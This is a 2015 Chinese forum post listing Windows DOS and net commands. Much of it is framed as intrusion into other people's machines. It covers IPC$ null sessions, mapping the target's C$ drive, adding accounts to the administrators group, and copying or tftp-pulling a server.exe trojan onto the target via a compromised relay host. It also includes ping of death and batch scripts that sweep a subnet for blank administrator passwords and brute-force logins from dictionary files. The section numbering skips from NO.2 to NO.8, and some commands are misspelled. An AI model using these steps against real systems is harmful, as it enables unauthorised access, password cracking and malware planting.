標題: DOS_命令大全_合集 [打印本頁] 作者: 51黑er 時間: 2015-11-10 01:45 標題: DOS_命令大全_合集 ------------------------------------------------------------------------------------------------------------------------------------- NO.1 -------------------------------------------------------------------------------------------------------------------------------------
net use \\ip\ipc$ " " /user:" "建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名"直接登陸后映射對方C:到本地為H:
net use h: \\ip\c$ 登陸后映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add把"用戶"添加到管理員中使其具有管理員權(quán)限,注意:administrator后加s用復(fù)數(shù)
net start 查看開啟了哪些服務(wù)
net start 服務(wù)名 開啟服務(wù);(如:net start telnet, net start schedule)
net stop 服務(wù)名 停止某服務(wù)
net time \\目標ip 查看對方時間
net time \\目標ip /set 設(shè)置本地計算機時間與"目標IP"主機的時間同步,加上參數(shù)/yes可取消確認信息
net view 查看本地局域網(wǎng)內(nèi)開啟了哪些共享
net view \\ip 查看對方局域網(wǎng)內(nèi)開啟了哪些共享
net config 顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置
net logoff 斷開連接的共享
net pause 服務(wù)名 暫停某服務(wù)
net send ip "文本信息" 向?qū)Ψ桨l(fā)信息
net ver 局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸后用將密碼改為12345
net password 密碼 更改系統(tǒng)登陸密碼
netstat -a 查看開啟了哪些端口,常用netstat -an
netstat -n 查看端口的網(wǎng)絡(luò)連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協(xié)議名 例:netstat -p tcq/ip 查看某協(xié)議使用情況(查看tcp/ip協(xié)議使用情況)
netstat -s 查看正在使用的所有協(xié)議使用情況
nbtstat -A ip對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數(shù)-A要大寫
tracert -參數(shù) ip(或計算機名) 跟蹤路由(數(shù)據(jù)包),參數(shù):"-w數(shù)字"用于設(shè)置超時間隔。
ping ip(或域名)向?qū)Ψ街鳈C發(fā)送默認大小為32字節(jié)的數(shù)據(jù),參數(shù):"-l[空格]數(shù)據(jù)包大小";"-n發(fā)送數(shù)據(jù)次數(shù)";"-t"指一直ping。
ping -t -l 65550 ip 死亡之ping(發(fā)送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 9598)查看本地ip地址,ipconfig可用參數(shù)"/all"顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統(tǒng)的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內(nèi))
kill -F 進程名加-F參數(shù)后強制結(jié)束某進程(為系統(tǒng)的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內(nèi))
del -F 文件名加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統(tǒng)、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的文件。例如"DEL/AR *.*"表示刪除當(dāng)前目錄下所有只讀文件,"DEL/A-S*.*"表示刪除當(dāng)前目錄下除系統(tǒng)文件以外的所有文件 -------------------------------------------------------------------------------------------------------------------------------------------
NO.2 -------------------------------------------------------------------------------------------------------------------------------------------
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數(shù)/Q可取消刪除操作時的系統(tǒng)確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動后文件名移動文件,用參數(shù)/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件并把不同之處輸出到3st.txt文件中,">"和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務(wù)
at /delete 停止所有計劃任務(wù),用參數(shù)/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務(wù)
at 查看所有的計劃任務(wù)
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序并重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 端口 遠和登陸服務(wù)器,默認端口為23
open ip 連接到IP(屬telnet登陸后的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑\文件名1 路徑\文件名2 /y復(fù)制文件1到指定的目錄為文件2,用參數(shù)/y就同時取消確認你要改寫一份現(xiàn)存目錄文件
copy c:\srv.exe \\ip\admin$ 復(fù)制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg將2st.txt的內(nèi)容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數(shù):/b指二進制文件,/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.*復(fù)制對方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要復(fù)制的文件或目錄樹 目標地址\目錄名 復(fù)制文件和目錄樹,用參數(shù)/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe登陸后,將"IP"的server.exe下載到目標主機c:\server.exe參數(shù):-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸后,上傳本地c:\server.exe至主機
ftp ip 端口用于上傳文件至服務(wù)器或進行文件操作,默認端口為21。bin指用二進制方式傳送(可執(zhí)行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網(wǎng)絡(luò)地址Network addres,子網(wǎng)掩碼Netmask,網(wǎng)關(guān)地址Gatewayaddres,接口地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責(zé)把一個IP解析成一個物理性的MAC地址。arp-a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口并最大化(最小化)運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統(tǒng),隱藏屬性;用+則是添加為某屬性
dir查看文件,參數(shù):/Q顯示文件及目錄屬系統(tǒng)哪個用戶,/T:C顯示文件創(chuàng)建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t使用此參數(shù)即"DATE/T"、"TIME/T"將只顯示當(dāng)前日期和時間,而不必輸入新日期和時間
set 指定環(huán)境變量名稱=要指派給變量的字符 設(shè)置環(huán)境變量
set 顯示當(dāng)前所有的環(huán)境變量
set p(或其它字符) 顯示出當(dāng)前以字符p(或其它字符)開頭的所有環(huán)境變量
pause 暫停批處理程序,并顯示出:請按任意鍵繼續(xù)....
if 在批處理程序中執(zhí)行條件處理(更多說明見if命令及變量)
goto 標簽 將cmd.exe導(dǎo)向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:":start"標簽)
call 路徑\批處理文件名 從批處理程序中調(diào)用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執(zhí)行某個特定命令(更多說明見for命令及變量)
echo on或off 打開或關(guān)閉echo,僅用echo不加參數(shù)則顯示當(dāng)前echo設(shè)置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值設(shè)置cmd控制臺前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統(tǒng)一改為:EntSky\ ) -------------------------------------------------------------------------------------------------------------------------------------------
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & netuse \\%1.%%G /user:administrator | find "命令成功完成">>test.txt
存為test.bat說明:對指定的一個C類網(wǎng)段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的 %1;%%G為變量(ip的最后一位);& 用來隔開echo 和net use 這二個命令;|指建立了ipc$后,在結(jié)果中用find查看是否有"命令成功完成"信息;%1.%%G 為完整的IP地址;(1 1 254)指起始值,增長量,結(jié)止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe說明:輸入一個IP后,用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。 -------------------------------------------------------------------------------------------------------------------------------------------
NO.8 -------------------------------------------------------------------------------------------------------------------------------------------if命令及變量 基本格式:
IF [not] errorlevel 數(shù)字 命令語句如果程序運行最后返回一個等于或大于指定數(shù)字的退出編碼,指定條件為"真"。
例:IF errorlevel 0 命令 指程序執(zhí)行后返回的值為0時,就值行后面的命令;IF not errorlevel 1命令指程序執(zhí)行最后返回的值不等于1,就執(zhí)行后面的命令。
0 指發(fā)現(xiàn)并成功執(zhí)行(真);1 指沒有發(fā)現(xiàn)、沒執(zhí)行(假)。
IF [not] 字符串1==字符串2 命令語句 如果指定的文本字符串匹配(即:字符串1 等于字符串2),就執(zhí)行后面的命令。
例:"if "%2%"=="4" gotostart"指:如果輸入的第二個變量為4時,執(zhí)行后面的命令(注意:調(diào)用變量時就%變量名%并加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執(zhí)行后面的命令。
例:"if not nc.exe goto end"指:如果沒有發(fā)現(xiàn)nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數(shù)字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else命令語句后指:當(dāng)前面的條件不成立時,就指行else后面的命令。注意:else 必須與 if 在同一行才有效。當(dāng)有del命令時需把del命令全部內(nèi)容用< >括起來,因為del命令要單獨一行時才能執(zhí)行,用上< >后就等于是單獨一行了;例如:"if exist test.txt. else echo test.txt.missing",注意命令中的"."